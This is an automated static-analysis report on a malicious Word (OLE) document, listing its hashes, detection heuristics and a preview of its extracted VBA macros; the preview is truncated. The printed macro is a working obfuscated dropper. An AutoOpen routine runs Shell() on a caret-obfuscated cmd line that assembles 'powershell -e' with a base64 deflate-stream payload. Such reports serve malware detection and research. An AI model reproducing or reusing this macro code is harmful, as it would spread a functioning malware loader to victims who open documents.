Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c950f6cbb9f20808…

MALICIOUS

Office (OLE)

Size: 88.8 KB | Created: 2018-06-06 10:47:00 | Authoring application: Microsoft Office Word | First seen: 2020-06-01
MD5: f89725f3d14310b303a65b958010dfba
SHA-1: 6db204ae068fa33bd2568bc960949798b143d922
SHA-256: c950f6cbb9f20808be551e5397e0b19632af7ea57da423158ec42fe24459e747
Risk score: 182

Heuristics (6)

  • VBA macros detected [medium] (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main | Channel: in document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas | Kind: vba-macro | Source: oletools.olevba.extract_macros (decoded VBA source) | Size: 11627 bytes
SHA-256: 75972920575e5c0f0a836719046152da0462aa8116116962d996ffa54ac66cd9

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "SZGjcNzjKFSzjh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function cGkHwm()
On Error Resume Next
HiwIQ = Hex(fUvojq + Hex(fQMvA) * 51982 + Round(lnPzoc))
QCJLX = Cos(rwhCv)
pfLQf = CDate(kpuvH)
zlaOU = Cos(BToVO)
lcLcX = Hex(jJzllO + Hex(WkvEnf) * 40226 + Round(zOlocc))
BcbUR = Cos(fCpHRK)
wNMzL = CDate(zdFPAq)
XoOaov = Cos(QIWJR)
cGkHwm = bMzAIJ + Shell(jrvWRui + Chr(cQsGi + vbKeyC + Hbwzaslnc) + HKnwcMWnC + aQqDULVDRGB + mkSciOUjzNn + cwZjzA + IJZkrHQiMc + WWWFAWfNuh, 40052 - 40052)
hrhGzV = Hex(IwjCl + Hex(oipvNa) * 57645 + Round(VroPS))
CvpqC = Cos(NGFwzR)
VlbELo = CDate(GcbMJ)
naMAtr = Cos(zRMGtz)
End Function
Sub Autoopen()
On Error Resume Next
PiZtw = Hex(vImumc + Hex(GPaUdj) * 37323 + Round(nuFCHm))
DYULMk = Cos(YDiPOn)
nSNRQY = CDate(rsdMjJ)
nTqpIP = Cos(NZbPq)
cGkHwm
rWmNS = Hex(Pzbrlq + Hex(vLjqw) * 61628 + Round(UkjraF))
ZaslB = Cos(NsVFPu)
tcMbF = CDate(tUthid)
PqGmum = Cos(HpZjG)
End Sub


Attribute VB_Name = "QACqabEfhrYH"
Function HKnwcMWnC()
On Error Resume Next
oYliO = Hex(OcRHqJ + Hex(LmjIE) * 36534 + Round(piiHYh))
QiTrMo = Cos(nKBRT)
WJRSPK = CDate(CpwOrJ)
UFuiF = Cos(RztzPi)
mOTESOC = "md " + "jZMqvUMV O" + "puUvzP" + "mDWo" + "jPmrjJTf w" + "SVBnPCz &   " + "  %^c^o^m^"
FYbfq = Hex(cXfQLs + Hex(jibkF) * 99646 + Round(juhQX))
mYYQU = Cos(lpsiO)
XHjho = CDate(imrznW)
rPblL = Cos(KIfwEw)
WRPHlIwff = "S^p^E" + "^c^% " + "    %^c^o^m" + "^S^p"
wJGYq = Hex(MRisW + Hex(FsikT) * 79106 + Round(CHcnKE))
nEKsIc = Cos(YtZfSG)
JrJXEi = CDate(wbXLJ)
wITVw = Cos(JMIGq)
YQjGszi = "^E^c^%" + "     " + "/V         " + "/c  " + "         " + "set %jZkwEYREQ" + "zUiHYj%=XCJ" + "ZzLKtpOQW&&set " + "%ZVJAjuUzHbGao%" + "=p&"
tUjzJE = Hex(iwtPT + Hex(FVbpc) * 74966 + Round(zJmQZD))
wzaAlT = Cos(LNZzSS)
aUCtA = CDate(qwhXj)
IkjiQ = Cos(GVCkX)
Phwwfqkv = "&set %zKkYu" + "ziS%=o^w&&s" + "et %YSIhMn" + "TzfrbrUmS%=zzz" + "aijik&&set"
iAdtHC = Hex(KUXYpj + Hex(YzszP) * 5351 + Round(RKCcf))
ZMzHp = Cos(JPAczq)
hWzlLu = CDate(tBIdDV)
ZMpaR = Cos(sQwXPi)
iQhMEliGir = " %SUXuSvSz" + "%=!%" + "ZVJAj" + "uUzHbGao%!&" + "&set %GdzXPrHqH" + "vjwrmV%="
HKnwcMWnC = mOTESOC + WRPHlIwff + YQjGszi + Phwwfqkv + iQhMEliGir
End Function
Function aQqDULVDRGB()
On Error Resume Next
aHYUvI = Hex(VzSYqi + Hex(QYDUDU) * 52632 + Round(CKBfOm))
YcWcB = Cos(lcnhu)
zbuRjj = CDate(csuDLN)
qFNSP = Cos(zEZpCO)
mdGukY = "EmGfaSENtA&&" + "se" + "t " + "%rKaW"
HivPmJ = Hex(bIItSw + Hex(KXdZK) * 28780 + Round(hjOURA))
vBEPVC = Cos(zziQCd)
izUATc = CDate(jwQrzz)
wjuUI = Cos(jGDdwt)
ACunNEEzlPG = "lEWtuIUo%" + "=e^r&&set %VQ" + "SNEcWJW" + "NT%=!%zKkYuziS" + "%!&&se"
MawIHl = Hex(ziuUwY + Hex(OFnXW) * 9880 + Round(zQjwu))
JbtqDa = Cos(aFzIjO)
ZPmaW = CDate(vRBPFa)
PNKPLN = Cos(jYoDQ)
VZZQMjdX = "t %roGwXJC" + "%=s&&set %tsOq" + "npoXbjnwink%=" + "jZG" + "USNbfWwcz&&" + "set %i" + "FwzciIaE" + "%=he&&s"
aaIIf = Hex(IBojiJ + Hex(KmsZil) * 57246 + Round(iNviwW))
TBaiK = Cos(JVJtjR)
nbdfF = CDate(DQrzKS)
mrMMZi = Cos(zhnIv)
wAzjGbQlzCS = "et %OHnSqG" + "Yjvkh%=ll&&!%S" + "UXuSvSz%!!%V" + "QSNEcWJWNT%" + "!!" + "%rKaW" + "lEWtuIUo" + "%!!%roGwXJC%!!%"
cARifu = Hex(MwHjQ + Hex(LStcBQ) * 31676 + Round(MSIwT))
AUFoV = Cos(HJDzIT)
zankc = CDate(zXwDFl)
fbQhIm = Cos(tSrtS)
NBBHlciiBl = "iFwzciIaE%!" + "!%OHnS" + "qGYjvkh%!  -e I" + "AAoA" + "E4ARQBXA" + "C0AbwBiAGoAZQBD"
jVBPu = Hex(hBRzY + Hex(jAWdBQ) * 954 + Round(dEjtV))
WHVjiu = Cos(OPbWj)
lEqNd = CDate(AclpQR)
sQkcpI = Cos(DwZflO)
wvPdWQ = "AFQAIABTA" + "FkAUwBUAEUAb" + "QAuAGkATwAuA" + "EMAbwBtAF" + "AAcgB" + "lAHMAUwBpAE"
QRkuHS = Hex(OwnqC + Hex(VOkSF) * 29066 + Round(BBinm))
oGpiL = Cos(ONkLBu)
wUiSw = CDate(nGZoLH)
VHcPmz = Cos(tdAYU)
EQfop = "8AbgAuAEQAZQBm" + "AG" + "wA" + "YQBUAG" + "UAc" + "wB0AFIAZQB" + "BAG0AKAAg" + "AFsAaQBvAC4Ab" + "QBFAE0AbwBSAF" + "kAcwB0AFI"
NnokDj = Hex(vQmXi + H
... (truncated)